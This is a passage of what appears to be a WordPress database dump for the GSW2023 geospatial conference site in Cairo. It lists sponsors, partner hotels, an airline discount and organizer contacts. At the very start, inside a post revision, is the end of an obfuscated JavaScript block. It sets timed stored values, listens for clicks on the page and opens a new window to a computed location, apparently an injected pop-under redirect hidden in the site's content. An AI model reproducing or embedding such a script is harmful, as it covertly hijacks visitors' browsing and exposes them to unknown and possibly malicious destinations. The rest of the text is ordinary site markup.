Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-19 21:44:07','2023-08-19 21:44:07','',3066,'https://gsw2023.com/?p=5341',0,'revision','',0),
(5342,1,'2023-08-19 21:49:11','2023-08-19 21:49:11','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]\r\n<h3 style=\"text-align: center;\"></h3>\r\n&nbsp;\r\n\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner]</p>\r\n[vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]\r\n\r\n<img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\">\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner]</p>\r\n<p style=\"text-align: center;\">[vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" 